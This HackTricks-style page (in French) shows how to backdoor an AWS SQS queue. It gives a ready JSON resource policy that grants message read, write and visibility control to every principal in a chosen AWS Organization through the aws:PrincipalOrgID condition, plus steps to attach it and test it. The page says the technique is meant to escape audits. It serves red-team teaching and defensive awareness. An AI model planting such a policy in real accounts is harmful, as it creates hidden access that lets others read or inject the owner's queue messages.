AWS - SQS OrgID Policy Backdoor

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks

Exploitez une resource policy d’une SQS queue pour accorder silencieusement Send, Receive et ChangeMessageVisibility Ă  tout principal appartenant Ă  une AWS Organization ciblĂ©e en utilisant la condition aws:PrincipalOrgID. Cela crĂ©e un chemin cachĂ© limitĂ© Ă  l’organisation qui Ă©chappe souvent aux contrĂŽles qui ne recherchent que des ARNs de comptes ou de rĂŽles explicites ou des star principals.

Backdoor policy (attach to the SQS queue policy)

{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "OrgScopedBackdoor",
"Effect": "Allow",
"Principal": "*",
"Action": [
"sqs:ReceiveMessage",
"sqs:SendMessage",
"sqs:ChangeMessageVisibility",
"sqs:GetQueueAttributes"
],
"Resource": "arn:aws:sqs:REGION:ACCOUNT_ID:QUEUE_NAME",
"Condition": {
"StringEquals": { "aws:PrincipalOrgID": "o-xxxxxxxxxx" }
}
}
]
}

Étapes

  • Obtenir l’Organization ID via AWS Organizations API.
  • RĂ©cupĂ©rer l’ARN de la queue SQS et dĂ©finir la queue policy incluant l’énoncĂ© ci‑dessus.
  • Depuis n’importe quel principal appartenant Ă  cette Organization, envoyer et recevoir un message dans la queue pour valider l’accĂšs.

Impact

  • AccĂšs cachĂ© Ă  l’échelle de l’Organization permettant de lire et Ă©crire des messages SQS depuis n’importe quel compte de l’AWS Organization spĂ©cifiĂ©.

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks